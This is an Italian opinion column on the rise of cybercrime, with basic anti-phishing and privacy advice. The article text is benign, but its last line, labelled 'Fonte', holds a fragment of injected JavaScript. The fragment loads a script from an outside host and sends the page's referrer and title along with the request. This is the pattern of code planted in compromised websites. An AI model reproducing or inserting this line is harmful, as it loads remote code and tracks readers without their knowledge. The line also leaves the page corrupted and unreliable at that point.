di * delegato italiano alla Proprietà intellettuale CONTATTI: mauro.masi@consap.it 

 

Recentissimi fatti di cronaca hanno imposto finalmente la dovuta attenzione anche ai media del nostro paese sul fenomeno del cybercrime. Un fenomeno, quello delle violazioni e del furto di dati sensibili fatto attraverso il web, in enorme espansione: fonti attendibili sostengono che i costi globali connessi al cybercrime toccheranno nel 2019 i 2 mila miliardi di dollari.

Non c’è da stupirsi: il fenomeno cresce in diretta proporzionalità con la crescita della rete, anzi c’è da presumere che possa fare un ulteriore balzo con lo sviluppo di «Internet of things» (la rete delle cose) che collegherà migliaia di dispositivi diversi, sensori e macchine. Del resto chiunque frequenti la rete anche occasionalmente può constatare direttamente come sia divenuta un inferno di trojan, backdoor, worm. Malware (che poi è l’abbreviazione di «maliciuos software» software dannoso) di ogni tipo e contenuto che tentano di carpire tutto quello che possono approfittando della sostanziale impunità che può garantire la rete (con qualche importante eccezione, come ancora dimostrano le cronache italiane di questi giorni). Si stima che a livello mondiale vengano immessi sul mercato dai 2 mila ai 3 mila nuovi malware al giorno; gli antivirus bloccano solo quelli che conoscono, se si crea un nuovo malware è possibile che passi e ottenga il proprio scopo. C’è un modo per difendersi? La risposta ovvia è che più si sta lontani da internet, meno si usano gli smartphone e più si è al sicuro. Naturalmente nel mondo contemporaneo è molto difficile farlo; purtuttavia è bene tenere presente alcuni punti fermi. Intanto partire dall’assunto che i cyberattack vengono fatti sia attraverso e-mail sia tramite social media e instant messanger (questi ultimi tendono ad essere preferiti dai malintenzionati perché, in genere, sono ritenuti più affidabili delle potenziali vittime). Bisogna quindi tentare di distinguere bene, prestando molta attenzione al contesto (chi sta scrivendo? Perché? Il messaggio è atteso? Lo stile del messaggio è normale? Ci sono precedenti?), un attacco di «phishing» (la truffa informatica proprio rivolta a carpire dati personali e/o sensibili) da una e-mail o da un messaggio social legittimi. Naturalmente la difesa è più facile se si riduce la potenziale «superficie di attacco» nel senso che non è (forse) possibile uscire del tutto dalla rete ma è certo possibile eliminarne la nostra presenza da quelle piattaforme non strettamente necessarie; pulire regolarmente le app non utilizzate; cambiare periodicamente le password. Tutto ciò è ben lungi dal garantire la protezione totale dai cybercrime ma almeno renderà la vita più difficile ai malintenzionati. E per come gira ora la rete e il mondo, non è poco.

© Riproduzione riservata

 
Fonte: s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;